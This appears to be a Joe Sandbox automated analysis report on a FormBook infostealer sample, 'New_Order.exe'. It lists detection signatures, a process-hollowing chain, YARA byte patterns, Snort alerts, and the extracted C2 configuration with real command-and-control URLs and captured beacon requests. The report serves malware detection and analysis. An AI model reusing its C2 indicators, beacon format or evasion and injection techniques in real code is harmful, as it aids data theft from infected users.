Joe Sandbox Cloud Basic Analysis Report

Loading ...

Play interactive tourEdit tour

Analysis Report New_Order.exe

Overview

General Information

Sample Name:New_Order.exe
Analysis ID:411746
MD5:74e4eb9afbf8f9c9b285a46ced831979
SHA1:8d65df9dc971c859f0a86a158d9576f528603410
SHA256:68c72cdcc504fcbffe3d6219cbeeed9586e0e362f073070eda7c0b4ed962d14a
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Dridex Process Pattern
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
C2 URLs / IPs found in malware configuration
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: Suspicious Svchost Process
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Startup

  • System is w10x64
  • New_Order.exe (PID: 6216 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: 74E4EB9AFBF8F9C9B285A46CED831979)
    • svchost.exe (PID: 6252 cmdline: 'C:\Users\user\Desktop\New_Order.exe' MD5: FA6C268A5B5BDA067A901764D203D433)
      • explorer.exe (PID: 3472 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • wscript.exe (PID: 6712 cmdline: C:\Windows\SysWOW64\wscript.exe MD5: 7075DD7B9BE8807FCA93ACD86F724884)
          • cmd.exe (PID: 6816 cmdline: /c del 'C:\Windows\SysWOW64\svchost.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6848 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x166b9:$sqlite3step: 68 34 1C 7B E1
    • 0x167cc:$sqlite3step: 68 34 1C 7B E1
    • 0x166e8:$sqlite3text: 68 38 2A 90 C5
    • 0x1680d:$sqlite3text: 68 38 2A 90 C5
    • 0x166fb:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16823:$sqlite3blob: 68 53 D8 7F 8C
    00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 16 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        1.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x158b9:$sqlite3step: 68 34 1C 7B E1
        • 0x159cc:$sqlite3step: 68 34 1C 7B E1
        • 0x158e8:$sqlite3text: 68 38 2A 90 C5
        • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
        • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
        0.2.New_Order.exe.24e0000.4.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          0.2.New_Order.exe.24e0000.4.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 7 entries

          Sigma Overview

          System Summary:

          barindex
          Sigma detected: Dridex Process PatternShow sources
          Source: Process startedAuthor: Florian Roth, oscd.community: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252
          Sigma detected: Suspicious Svchost ProcessShow sources
          Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252
          Sigma detected: Windows Processes Suspicious Parent DirectoryShow sources
          Source: Process startedAuthor: vburov: Data: Command: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine: 'C:\Users\user\Desktop\New_Order.exe' , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ParentImage: C:\Users\user\Desktop\New_Order.exe, ParentProcessId: 6216, ProcessCommandLine: 'C:\Users\user\Desktop\New_Order.exe' , ProcessId: 6252

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.voiceclubdubai.com/icsm/"], "decoy": ["roastedorganic.com", "dh1002020.com", "yologgook.com", "bg1133.com", "letsreflectonline.net", "year-action.xyz", "shanghainternational.com", "lanarkshirecleaningservices.com", "ahorradoramente.com", "kantan-sedori.com", "arshpowerelectrical.com", "thepagan.life", "hkequan.com", "1ratedfivegnetwork.com", "desailldada.com", "algaeflipflops.com", "connorneill.com", "fareblog01.com", "fjfortuny.com", "logictech.info", "bathtest.com", "truckwellfreight.com", "guesttransparent.com", "coffeyquiltco.com", "goorganickw.com", "12clyderoad.com", "hdjakdhf.com", "meloncholica.com", "happyfingersfood.com", "web3kit.com", "tmtbarsuppliers.com", "blackradstore.com", "lomejorparasalud.com", "dasabito.com", "shopperzguide.com", "portsalernoboatrental.com", "keywestshaman.com", "clarocrdemo.com", "cafesmexico.com", "lagemanndentistry.com", "nortonviggiano.com", "accuworkflow.com", "cankuntech.com", "the-evening-code.com", "westervillelegends.com", "susanestuart.com", "cunerier.com", "nicustoms.academy", "avocats-biaisetassocies.com", "w-c727or.net", "websitemax.co.uk", "nrlalivelearning.com", "thehostessedit.com", "heauxceaux.com", "case72-paypal.com", "charmboutiques.com", "thelordnelsonwinthorpe.com", "landbkids.com", "mowingpedia.com", "katherinegazda.com", "geacasolaro.com", "masautonomo.com", "quietaustraliansstandup.com", "bellarealestatebkk.com"]}
          Multi AV Scanner detection for dropped fileShow sources
          Source: C:\Users\user\AppData\Local\Temp\nshC36E.tmp\a9g5j8lkcs3.dllReversingLabs: Detection: 44%
          Multi AV Scanner detection for submitted fileShow sources
          Source: New_Order.exeVirustotal: Detection: 38%Perma Link
          Source: New_Order.exeReversingLabs: Detection: 59%
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Machine Learning detection for sampleShow sources
          Source: New_Order.exeJoe Sandbox ML: detected
          Source: 0.2.New_Order.exe.24e0000.4.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: 1.2.svchost.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: New_Order.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
          Source: New_Order.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: wscript.pdbGCTL source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: Binary string: wntdll.pdbUGP source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, 00000001.00000003.237522923.0000000003700000.00000004.00000001.sdmp, wscript.exe, 00000007.00000002.496537518.0000000004840000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: New_Order.exe, 00000000.00000003.230980266.0000000002AF0000.00000004.00000001.sdmp, svchost.exe, wscript.exe
          Source: Binary string: wscript.pdb source: svchost.exe, 00000001.00000002.278512625.0000000003890000.00000040.00000001.sdmp
          Source: Binary string: svchost.pdb source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: svchost.pdbUGP source: wscript.exe, 00000007.00000002.497952984.0000000004D77000.00000004.00000001.sdmp
          Source: Binary string: wscui.pdb source: explorer.exe, 00000002.00000002.510158064.0000000007180000.00000002.00000001.sdmp
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
          Source: C:\Users\user\Desktop\New_Order.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop esi1_2_0041581A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_0040C3EA
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop esi7_2_0062581A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 4x nop then pop edi7_2_0061C3EA

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49717 -> 91.148.168.141:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49718 -> 62.149.189.71:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49720 -> 85.233.160.22:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.voiceclubdubai.com/icsm/
          Performs DNS queries to domains with low reputationShow sources
          Source: C:\Windows\explorer.exeDNS query: www.year-action.xyz
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 75.2.115.196 75.2.115.196
          Source: Joe Sandbox ViewIP Address: 23.227.38.74 23.227.38.74
          Source: Joe Sandbox ViewASN Name: AMAZON-02US AMAZON-02US
          Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
          Source: Joe Sandbox ViewASN Name: TELEPOINTBG TELEPOINTBG
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: unknownDNS traffic detected: queries for: www.roastedorganic.com
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: openrestyDate: Wed, 12 May 2021 04:11:08 GMTContent-Type: text/html; charset=utf-8Content-Length: 253Connection: closeX-Varnish: 824312071Retry-After: 5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 68 31 3e 45 72 72 6f 72 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 20 20 3c 70 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 70 3e 0a 20 20 20 20 3c 68 33 3e 47 75 72 75 20 4d 65 64 69 74 61 74 69 6f 6e 3a 3c 2f 68 33 3e 0a 20 20 20 20 3c 70 3e 58 49 44 3a 20 38 32 34 33 31 32 30 37 31 3c 2f 70 3e 0a 20 20 20 20 3c 68 72 3e 0a 20 20 20 20 3c 70 3e 56 61 72 6e 69 73 68 20 63 61 63 68 65 20 73 65 72 76 65 72 3c 2f 70 3e 0a 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html> <head> <title>404 Not Found</title> </head> <body> <h1>Error 404 Not Found</h1> <p>Not Found</p> <h3>Guru Meditation:</h3> <p>XID: 824312071</p> <hr> <p>Varnish cache server</p> </body></html>
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: New_Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
          Source: New_Order.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/bThe
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn/cThe
          Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmpString found in binary or memory: http://www.galapagosdesign.com/DPlease
